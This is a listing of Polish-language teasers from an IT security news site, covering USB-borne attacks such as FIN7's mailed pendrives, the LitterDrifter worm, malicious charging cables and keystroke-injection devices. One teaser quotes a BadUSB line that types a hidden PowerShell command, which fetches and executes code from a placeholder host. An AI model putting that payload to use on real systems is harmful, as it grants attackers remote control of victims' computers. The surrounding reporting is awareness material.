Wstęp Tekst przygotował jeden z naszych czytelników. Całość opracowania jest z punktu widzenia administratora rozwiązań z zakresu bezpieczeństwa, podczas incydentu, w firmie posiadającej ~2000 komputerów. Wszystko zaczęło się tak: otrzymujemy powiadomienie o incydencie wysokiego poziomu z naszego oprogramowania EDR. Nie zdążyliśmy zalogować się na konsolę a otrzymaliśmy już kolejne 2…
Czytaj dalej »
Checkpoint donosi o nowych osiągnięciach ~rosyjskiej grupy APT – Gamaredon. Dokładniej chodzi o malware LitterDrifter o którym czytamy co następuje: Robak LitterDrifter jest napisany w języku VBS i ma dwie główne funkcje: automatyczne rozprzestrzenianie się na dyskach USB oraz komunikację z szerokim, elastycznym zestawem serwerów C&C. (…). LitterDrifter wydaje się…
Czytaj dalej »
Palo Alto opublikowało właśnie analizę wariantów pewnego malware. Otwierasz pendrive i widzisz coś takiego jak na zrzucie ekranowym poniżej. Kliknąłbyś w ten „folder” czy „dysk”? Błąd – bo zainfekowałbyś swój komputer. Co więcej, malware automatycznie infekuje kolejne dyski przenośne, które podłączasz do komputera… Jak widać powyżej, jedyny normalnie widoczny zasób…
Czytaj dalej »
Można powiedzieć, że jest to pewna spora aktualizacja funkcji dostępnych do tej pory w innym projekcie: USB Ninja. Tym razem kabel O.MG umożliwia komunikację z atakującym poprzez własne WiFi (a nie przez Bluetooth, gdzie jest mocno ograniczony zasięg): Działa jak normalny kabel ładujący / przesyłający dane, aż do momentu kiedy…
Czytaj dalej »
FBI donosi o wzmożonej aktywności grupy FIN7. Swego czasu wysyłała ona (i nadal wysyła) pocztą / kurierem „karty prezentowe” np. na kwotę $50. Co można za to (rzekomo) kupić? Tego dowiesz się podłączając do komputera załączonego pendrive-a: Ale przecież z pendrive-a nic samodzielnie się nie uruchomi bez kliknięcia na plik!…
Czytaj dalej »
„Dziękujemy za bycie lojalnym klientem Best Buy. W nagrodę wysyłamy kartę prezentową na 50$. Te pieniądze możesz wydać na dowolny produkt z listy przesłanej na pendrive” – taką wiadomość w skrzynce pocztowej znaleźli pracownicy pewnej firmy, razem ze wspomnianą kartą prezentową i pendrivem, jak podaje TrustWave. W rzeczywistości pendrive był…
Czytaj dalej »
Uwaga, w tej wiadomości jest dużo oszustw. Może same oszustwa. Pytanie tylko kto i jak oszukiwał…? W każdym razie Chinka – Yujing Zhang- chciała się przedostać do quasi publicznego kompleksu wypoczynkowego – Mar-a-Lago: Wg doniesień wydarzenie z udziałem prezydenta Trumpa miało być ogłaszane na chińskich social media przez osobę, która…
Czytaj dalej »
Popatrzcie na projekt USBninja. To kabelki USB w różnych odmianach (ze „zwykłym” USB, micro-USB, USB-C, lightning). Wyglądają porządnie i takoż działają (wspierany jest transfer danych i ładowanie). Co wyróżnia taki kabel? Wbudowany niewidoczny na zewnątrz układ, który może być aktywowany zdalnie (Bluetooth) i powodujący, że kabel nagle staje się… klawiaturą…
Czytaj dalej »
W największym skrócie – potrzebny jest Linux, trochę szarych komórek i ten tutorial. Macie drukarkę dostępną tylko po USB (bez portu ethernetowego czy WiFi), a chcielibyście drukować po sieci? Nie ma problemu. Macie kamerkę na USB, z której chcielibyście mieć zdalny podgląd – fraszka. USB over IP to co ciekawe…
Czytaj dalej »
Jak wskazuje osoba która, dość dokładnie przeanalizowała urządzenie, cała zabawka – S8 data line locator – kosztuje 7 Euro (transport z Chin w cenie). The device features a SIM card slot hidden in the USB plug and can be used to remotely query its location as well as listen in…
Czytaj dalej »
Opis przygotowania pendrive, który po podłączeniu działa jak klawiatura. Klawiatura ta z kolei wpisuje zaprogramowaną wcześniej sekwencję klawiszy – np. uruchamia powershella i daje zdalny dostęp na docelowy komputer. Np. tak: Keyboard.println(„powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring(’http://1.2.3.4:8080/’);”); Keyboard.write(KEY_RETURN); Sercem projektu jest produkt „Adafruit Trinket – Mini Microcontroller” –…
Czytaj dalej »
Przypomina Wam to coś? Tak, to jedna z podatności, która była wykorzystywana przez Stuxnet, atakujący irańskie instalacje jądrowe. To było w roku 2010. Później okazało się, że Microsoft chyba nie do końca dobrze załatał podatność i znowu mieliśmy podobny problem… w roku 2015: The patch failed. And for more than…
Czytaj dalej »
Wkładasz pendrive do laptopa i po chwili przestaje on działać? Tak działa w skrócie narzędzie USB killer, palące obwody komputera ofiary… Co ma jeszcze port USB? Telefon, router, samochód… wyobraźnia psujów jest nieograniczona. Niedawno udostępniono jego nową wersję, która ma nawet certyfikaty bezpieczeństwa, gwarantujące że nie porażą prądem użytkownika… (a…
Czytaj dalej »
Sophos pisze na swoim blogu o akcji australijskiej policji. Szuka ona osób, które wysyłają zainfekowane pendrajwy tradycyjną pocztą: The USB drives are believed to be extremely harmful and members of the public are urged to avoid plugging them into their computers or other devices. Pendrajwy są nieoznakowane, ale gdyby skorzystali…
Czytaj dalej »
Pewnie część z Was zna już produkt USB RUBBER DUCKY – to pendrive będący w rzeczywistości klawiaturą na USB, w której można prekodować sekwencje klawiszy które zostaną wysłane po podłączeniu sprzętu do komputera: Rubber Ducky dostępny jest na rynku od długiego czasu, a teraz udostępniono zaktualizowaną wersję kodera (w pythonie) umożliwiającą „załadowanie”…
Czytaj dalej »